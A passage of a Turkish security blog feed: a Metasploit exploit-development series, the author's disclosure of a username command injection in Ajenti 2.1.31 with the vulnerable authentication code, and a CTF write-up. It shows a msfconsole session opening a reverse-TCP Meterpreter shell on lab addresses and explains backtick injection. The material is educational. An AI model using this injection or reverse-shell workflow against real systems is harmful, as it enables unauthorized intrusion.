&lt;span class=&quot;n&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;webapp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_auth_username_cmd_injection&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;set&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;LHOST&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.1&lt;/span&gt;
&lt;span class=&quot;no&quot;&gt;LHOST&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.1&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;webapp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_auth_username_cmd_injection&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;check&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.154&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;8000&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;The&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;target&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;appears&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;to&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;be&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;vulnerable&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;
&lt;span class=&quot;nf&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;webapp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_auth_username_cmd_injection&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;

&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Started&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;reverse&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;TCP&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;handler&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;on&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4444&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Exploiting&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Sending&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;stage&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;53755&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;bytes&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;to&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.154&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Meterpreter&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;session&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;opened&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4444&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&amp;gt;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.154&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;34840&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;at&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2019&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;12&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;15&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;16&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;22&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;mo&quot;&gt;04&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mo&quot;&gt;0300&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;meterpreter&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Dışarıdan indirilen bir modülü Metasploit ile kullanmak için &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modules/exploits&lt;/code&gt; adında dizin oluşturup &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.rb&lt;/code&gt; dosyası oluşturulan dizinin içine atılır.&lt;/p&gt;
&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;mkdir&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; modules/exploits
&lt;span class=&quot;nb&quot;&gt;cd &lt;/span&gt;modules/exploits
nano ajenti_test.rb
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Metasploit’de &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;loadpath /home/user/Desktop/modules&lt;/code&gt; şeklinde oluşturduğunuz yol eklenir.&lt;/p&gt;

&lt;div class=&quot;language-ruby highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;msf6&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;loadpath&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;~&lt;/span&gt;&lt;span class=&quot;sr&quot;&gt;/modules
Loaded 1 modules:
    1 exploit modules
msf6 &amp;gt; use exploit/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_test&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Using&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;configured&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;payload&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;python&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;meterpreter&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;reverse_tcp&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;msf6&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_test&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Eklenen modül içerisinde değişiklik yapıldığında bu değişikliğin geçerli olması için “reload” komutu çalıştırılır.&lt;/p&gt;

&lt;p&gt;Eğer eklediğiniz modülün her Metasploit çalıştığında otomatik olarak içeri aktarılmasını isterseniz ~/.msf4/modules altına atmanız gerekir. Buraya atılan modüller açılışta otomatik olarak içeri aktarılır.&lt;/p&gt;

&lt;div class=&quot;language-shell highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;cd&lt;/span&gt; ~/.msf4/modules/exploits
nano ajenti_test.rb
&lt;span class=&quot;nb&quot;&gt;cd&lt;/span&gt; ~/tools/metasploit-framework/
metasploit-framework git:&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;master&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ./msfconsole &lt;span class=&quot;nt&quot;&gt;-q&lt;/span&gt;
msf6 &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; use exploit/ajenti_test
&lt;span class=&quot;o&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;]&lt;/span&gt; Using configured payload python/meterpreter/reverse_tcp
msf6 exploit&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;ajenti_test&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
</description>
        <pubDate>Fri, 13 Dec 2019 00:00:00 +0000</pubDate>
        <link>/metasploit-exploit-gelistirme-2/</link>
        <guid isPermaLink="true">/metasploit-exploit-gelistirme-2/</guid>
        
        <category>exploit</category>
        
        <category>development</category>
        
        <category>metasploit</category>
        
        
      </item>
    
      <item>
        <title>Metasploit Exploit Geliştirme - 1</title>
        <description>&lt;h3 id=&quot;temel-kavramlar&quot;&gt;Temel Kavramlar&lt;/h3&gt;

&lt;h4 id=&quot;vulnerability&quot;&gt;Vulnerability&lt;/h4&gt;

&lt;p&gt;Herhangi bir yazılımın içerisinde yer alan sistem hatalarıdır. Bu zafiyetler;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;bir servisten(smb),&lt;/li&gt;
  &lt;li&gt;bir plugin/eklentiden(wordpress eklentileri),&lt;/li&gt;
  &lt;li&gt;Bir yazılımdan(firefox),&lt;/li&gt;
  &lt;li&gt;hatalı/eksik kod yazımından(xss, sqli)
kaynaklanabilir.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;exploit&quot;&gt;Exploit&lt;/h4&gt;

&lt;p&gt;Exploit kelime anlamı olarak bir şeyi kendi avantajına kullanmak demektir. İstenmeyen yada beklenmeyen bir duruma neden olmak için bir hata veya güvenlik açığından yararlanan koddur. Bu genelde sistemi ele geçirme, yetki yükseltme, hizmet dışı bırakma ve bilgi ele geçirme için kullanılır.&lt;/p&gt;

&lt;p&gt;Bu noktada exploitler bazı kriterlere göre gruplara ayrılmıştır. Genel hatlarıyla exploit türlerine baktığımızda bunlar;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Remote Exploit&lt;/li&gt;
  &lt;li&gt;Local Exploit&lt;/li&gt;
  &lt;li&gt;Dos Exploit&lt;/li&gt;
  &lt;li&gt;Web App Exploit&lt;/li&gt;
  &lt;li&gt;Zero Day Exploit&lt;/li&gt;
  &lt;li&gt;One Day Exploit&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;olarak 6 gruba ayırmak mümkündür.&lt;/p&gt;

&lt;h5 id=&quot;remote-exploit&quot;&gt;Remote Exploit&lt;/h5&gt;
&lt;p&gt;İstismar edilecek sisteme sadece uzaktan erişimin yeterli olduğu exploit türüdür. Genellikle dışarıya portları açık olan servislerde görülür.&lt;/p&gt;

&lt;h5 id=&quot;local-exploit&quot;&gt;Local Exploit&lt;/h5&gt;
&lt;p&gt;İstismar edilecek sisteme erişimin olmasının yanında sistem üzerinde erişim sağlanacak bir hesabında olmasını gerektiren exploit türüdür.
Örneğin; Paylaşımlı hostinglerde, sadece bir web hostun hacklenerek elde edilen düşük seviyeli kullanıcı hesabından (local)exploit çalıştırarak sunucuda root haklarına sahip olmaya çalışmak.&lt;/p&gt;

&lt;h5 id=&quot;ddos-exploit&quot;&gt;(D)Dos Exploit&lt;/h5&gt;
&lt;p&gt;Sistemin kendisini veya sistemde var olan bir servisi hizmet veremeyecek duruma getiren exploit türüdür. Sisteme herhangi bir sızma söz konusu değildir. Tek bir kaynaktan yapıldığında dos, dağıtılmış bir şekilde bir çok noktadan tek bir noktaya yapılan saldırı türlerine ise ddos denir.&lt;/p&gt;

&lt;h5 id=&quot;zero-day-exploit&quot;&gt;Zero Day Exploit&lt;/h5&gt;
&lt;p&gt;Daha önce keşfedilmeyen bir zafiyet bulup bunu istismar edecek exploit kodunu yazan kişiden(grup) başka kimsenin bilmediği zafiyettir/exploittir. Zafiyete söz konusu olan firma/ürün bile exploit public edildiği zaman haberdar olur. Ayrıca zafiyet ortaya çıktıktan sonra geliştirici tarafından bir güncelleme sunulamadan önce faydalanılan bir exploittir.&lt;/p&gt;

&lt;h5 id=&quot;one-day-exploit&quot;&gt;One Day Exploit&lt;/h5&gt;
&lt;p&gt;Public edilen zero day exploitin etkilediği yazılım patch geçmesine rağmen zafiyetli sürümün hala son kullanıcılar arasında yaygın bir şekilde kullanılmasından dolayı exploitten etkilendiği exploit çeşididir.&lt;/p&gt;

&lt;h4 id=&quot;encoders&quot;&gt;Encoders&lt;/h4&gt;

&lt;p&gt;Sistemde bulunan antivirüs, firewall, ips/ids gibi korunma sistemlerine yakalanmamak için (bypass) gönderilecek olan zararlı kodların (payload) encode işleminden geçirilmesi sonucu zararlı yazılımın sistem tarafından tespit edilmesini zorlaştıran araçlardır.&lt;/p&gt;

&lt;h4 id=&quot;auxiliary&quot;&gt;Auxiliary&lt;/h4&gt;
&lt;p&gt;Hedef sistem hakkında bilgi toplamak için yapılan taramalardır.
Path traversial, local file download, file read gibi zafiyetleri istismar etmek için auxiliary modülleri vardır. Bunlar saldırgana herhangi bir shell oturumu vermediklerinden exploit olarak değerlendirilmezler.&lt;/p&gt;

&lt;h4 id=&quot;payload&quot;&gt;Payload&lt;/h4&gt;
&lt;p&gt;Exploit sonrası hedef sistemde çalışacak olan kodlardır. Platforma ve işletim sistemine bağlıdırlar. Meterpreter, dll injection, binary upload en sık kullanılan payloadlar arasında gösterilebilir.&lt;/p&gt;

&lt;p&gt;Üç grupta incelenebilirler.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Stagers&lt;/li&gt;
  &lt;li&gt;Stages&lt;/li&gt;
  &lt;li&gt;Single(Inline / Non Staged)&lt;/li&gt;
&lt;/ul&gt;

&lt;h5 id=&quot;stagers&quot;&gt;Stagers&lt;/h5&gt;

&lt;p&gt;Hedef ile saldırgan arasındaki veri iletişiminin sağlanması için gerekli bağlantıyı sağlar. Boyutu küçüktür. Bağlantı kurulduktan sonra büyük boyutlu olan payloadları hedef makineye göndermekle sorumludurlar.
En çok kullanılanlar arasında bind_tcp, reverse_tcp,  http_tcp, reverse_http, bind_http gösterilebilir.&lt;/p&gt;

&lt;h5 id=&quot;stages&quot;&gt;Stages&lt;/h5&gt;
&lt;p&gt;Stagers ile bağlantı sağlandıktan sonra hedef sisteme gönderilerek çalıştırılacak olan payloadlardır. Hedef sistem üzerinde birçok post exploit işlemi gerçekleştirebilirler. Büyük boyutlu ve komplexdirler. Meterpreter, vnc injection, ipwn örnek olarak gösterilebilir.&lt;/p&gt;

&lt;p&gt;Stagers(stage0 olarak da geçer) ve stages(stage1 olarak de geçer)’in en belirgin özellikleri aşağıdaki gibidir.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Initial shellcode (Stage0, stagers) saldırganın makinesine bağlantı isteği gönderebilir. Bu genellikle reverse_* olur.&lt;/li&gt;
  &lt;li&gt;Stege0 hedef sisteme bir kez yüklendikten sonra kendisinden sonra gelecek olan payloadları belleğe yerleştirip çalıştırmasından sorumludur.&lt;/li&gt;
  &lt;li&gt;Stege0’dan sonra boyut olarak daha büyük olan stage1 payloadı gönderilir ki bu shell oturumu veren payload da olabilir veya daha komplex olan bir meterpreter oturumu da olabilir.&lt;/li&gt;
&lt;/ul&gt;

&lt;h5 id=&quot;singles-inline--non-staged&quot;&gt;Singles (Inline / Non Staged)&lt;/h5&gt;
&lt;p&gt;İhtiyaç duyduğu bütün bileşenleri içinde barındırır. Belli bir işi yapmak kullanılırlar. Stage payloadlara göre daha küçük boyutludur. Örneğin, hedef sisteme bir kullanıcı ekleyen payload, işlemini yapar ve durur. Başka bir komut satırına ihtiyaç duymaz.&lt;/p&gt;
</description>
        <pubDate>Thu, 12 Dec 2019 00:00:00 +0000</pubDate>
        <link>/metasploit-exploit-gelistirme-1/</link>
        <guid isPermaLink="true">/metasploit-exploit-gelistirme-1/</guid>
        
        <category>exploit</category>
        
        <category>development</category>
        
        <category>metasploit</category>
        
        
      </item>
    
      <item>
        <title>Ajenti 2.1.31 Command Execution Exploit</title>
        <description>&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;def authenticate(self, username, password):
       child = None
       try:
           child = pexpect.spawn(&apos;/bin/sh&apos;, [&apos;-c&apos;, &apos;/bin/su -c &quot;/bin/echo SUCCESS&quot; - %s&apos; % username], timeout=5)
           child.expect(&apos;.*:&apos;)
           child.sendline(password)
           result = child.expect([&apos;su: .*&apos;, &apos;SUCCESS&apos;])
       except Exception as err:
           if child and child.isalive():
               child.close()
           logging.error(&apos;Error checking password: %s&apos;, err)
           return False
       if result == 0:
           return False
       else:
           return True

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Yukarıdaki kod bloğunda Ajenti’nin 2.1.31 sürümünde kimlik doğrulaması için kullanılan fonksiyon verilmiştir.&lt;/p&gt;

&lt;p&gt;Pexpect, Python üzerinden diğer yazılımları kontrol etmemize yardımcı olan bir modüldür. Pexpect çocuk süreç başlatmamızı, onları kontrol etmemizi ve beklenen kalıplarda cevap vermemizi sağlar. spawn sınıfı ile çocuk süreç oluşturulur. Expect ve sendline kullanılarak beklenen input’a cevap verilir.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-python&quot; data-lang=&quot;python&quot;&gt;  
&lt;span class=&quot;n&quot;&gt;child&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;pexpect&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;spawn&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;/bin/sh&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;-c&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&apos;/bin/su -c &quot;/bin/echo SUCCESS&quot; - %s&apos;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;username&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;timeout&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;child&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;expect&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;.*:&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;child&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sendline&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;password&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;kodu ile username değişkeninde alınan kullanıcının yetkileri ile &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;su -c “/bin/echo SUCCESS”&lt;/code&gt; komutu çalıştırılmaya çalışılır. Parola doğru girilir ise ekrana SUCCESS mesajı basılır.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-python&quot; data-lang=&quot;python&quot;&gt;  
&lt;span class=&quot;n&quot;&gt;result&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;child&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;expect&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;([&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;su: .*&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&apos;SUCCESS&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;satırı ile Ekrana basılan çıktı result değişkenine atanır. Parola doğru girilmiş ise authenticate fonksiyonu True döndürür.&lt;/p&gt;

&lt;p&gt;Backtick (`) arasına yazılanlar Linux’da komut olarak algılanır ve çalıştırılır. Örneğin komut satırı üzerinde &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;echo `whoami`&lt;/code&gt; komutunu çalıştırırsanız çıktıda sizin kullanıcı adınızı ekrana bastıracaktır.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST /api/core/auth HTTP/1.1
Host: 172.16.172.152:8000
Connection: keep-alive
Content-Length: 56
Accept: application/json, text/plain, */*
Origin: http://172.16.172.152:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: tr,tr-TR;q=0.9,en-US;q=0.8,en;q=0.7

{&quot;username&quot;:&quot;deneme&quot;,&quot;password&quot;:&quot;12345&quot;,&quot;mode&quot;:&quot;normal&quot;}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Eğer giriş formunda kullanıcı adı yerine ` ` işaretleri içerisini bir komut yazarsak bu komut sistem üzerinde çalıştırılacaktır. Fakat ekranda bir çıktı gözükmeyecektir.&lt;/p&gt;

&lt;p&gt;Yazmış olduğum exploit’e &lt;a href=&quot;https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/ajenti_auth_username_cmd_injection.rb&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;buradan&lt;/a&gt; erişebilirsiniz.&lt;/p&gt;
</description>
        <pubDate>Thu, 12 Dec 2019 00:00:00 +0000</pubDate>
        <link>/ajenti-command-execution-exploit/</link>
        <guid isPermaLink="true">/ajenti-command-execution-exploit/</guid>
        
        <category>exploit</category>
        
        <category>ajenti</category>
        
        
      </item>
    
      <item>
        <title>Siber Yıldız 2019 Çözümleri</title>
        <description>&lt;p&gt;Bilgi Teknolojileri ve İletişim Kurumu tarafından düzenlenen ve 1 Şubat akşamı başlayıp 24 saat süren CTF’in çözümleri.&lt;/p&gt;

&lt;h3 id=&quot;bu-gerçekten-kolay&quot;&gt;Bu Gerçekten Kolay&lt;/h3&gt;

&lt;p&gt;Sorudaki &lt;a href=&quot;/assets/files/siber-yildiz-2019-cozumleri/dikkatlibak&quot; target=&quot;blank&quot;&gt;dosyayı&lt;/a&gt;  indirip strings aracı ile baktığımızda flag direkt çıkıyordu.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/dikkatlibak.jpg&quot; alt=&quot;dikkatlibak flag&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;hala-ısınmalardasın&quot;&gt;Hala ısınmalardasın&lt;/h3&gt;

&lt;p&gt;Sayfanın kaynak koduna baktığımızda obfuscate edilmiş bir javascript kodu vardı.
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/halaisinmalardasin.jpg&quot; alt=&quot;Hala ısınmalardasın javascript&quot; /&gt;&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Kısmını herhangi bir hex çevirme aracına atarsak &lt;strong&gt;fromCharCode&lt;/strong&gt; yazdığını görüyoruz. Bu aşamada &lt;a href=&quot;https://www.rapidtables.com/convert/number/hex-to-ascii.html&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;bu siteyi&lt;/a&gt; kullanabilirsiniz. FromCharCode fonksiyonu girilen Unicode değerlerini karakterlere çevirir. Bu işlem için de &lt;a href=&quot;https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;linkteki&lt;/a&gt; siteyi kullanabilirsiniz.&lt;br /&gt;
Veya daha kısa bir çözüm yolu olarak koddaki eval fonksiyonunu kaldırıp tarayıcının javascript consoluna yapıştırırsanız flagi verecektir.&lt;br /&gt;
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/js-konsol.jpg&quot; alt=&quot;Javascript Konsolu&quot; /&gt;&lt;/p&gt;

